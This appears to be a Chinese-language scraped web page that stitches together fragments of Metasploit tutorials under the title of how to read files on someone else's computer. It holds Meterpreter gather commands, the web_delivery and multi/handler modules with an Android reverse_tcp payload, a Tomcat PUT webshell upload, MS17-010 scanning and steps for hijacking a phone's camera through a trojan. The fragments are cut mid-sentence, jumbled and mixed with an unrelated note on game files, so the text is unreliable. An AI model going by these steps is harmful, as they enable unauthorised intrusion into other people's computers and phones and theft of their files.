msf怎么获取别人文件,如何读取另一台电脑文件

msf怎么获取别人文件,如何读取另一台电脑文件

1.下载完后直接解压缩到当前文件夹2.打开Vmware后点击“打开虚拟机”，如图：3.打开“Metasploitable.vmx”虚拟机文件4.开启虚拟机使用普通用户：msfadmin 密码：msfadmin 进行登run post/windows/gather/enum_applications #获取安装软件信息run post/windows/gather/dumplinks #获取最近的文件操作run scraper #获取常见信息#保存在～/.msf4/logs/scripts

(ˉ▽ˉ；) 在kali上运行msf,查找web_delivery对应模块msfconsole search web_delivery 选择攻击模块，显示参数useexploit/multi/script/web_delivery show options show该漏洞可以利用HTTP的PUT方法直接上传webshell到目标服务器，从而获取权限。该漏洞是高危漏洞，在Tomcat的web.xml默认情况下不存在该漏洞，但是一单开发者或者运

设置完成之后，就可以执行扫描了。msf auxiliary(smb_ms17_010) >spool ms17-010.txt # 输出记录写入到文件[*] Spooling tofilems17-010.txt msf auxiliary(smb_ms17_010)首先，使用MSF的search命令查找可用的文件上传漏洞利用模块，命令如下：``` msf > search upload ``` 2. 找到一个目标系统存在文件上传漏洞的网站，并确定上传文件的路径和可上传的文件

在目标手机上点一下木马文件(没有页面),则可成功建立攻击会话：四、获取摄像头成功拿到msf中会建立会话执行命令sysinfo 查看系统信息app_list 查看安装app文件check_root 检测msf文件有两种含义：1、指手机下载的一些游戏的文件，在游戏运行过程中产生的，不要删除，有些记录缓存保存在里面，删除可能导致游戏无法启动等；2、指手机上的录音

命令：nmap -p 445 192.168.78.160 3.7 利用Metasploit(msf)框架进行对受害者Win7主机的445端口扫描，如下图所示。命令：msfconsole 3.8 利用Metasploit(msf)检索smb漏洞利用模块，如下图所示。命令命令：msfconsole 4.配置参数(1)命令：use exploit/multi/handler（选择模块）2)命令：set payload android/meterpreter/reverse_tcp（选择攻击模块）3)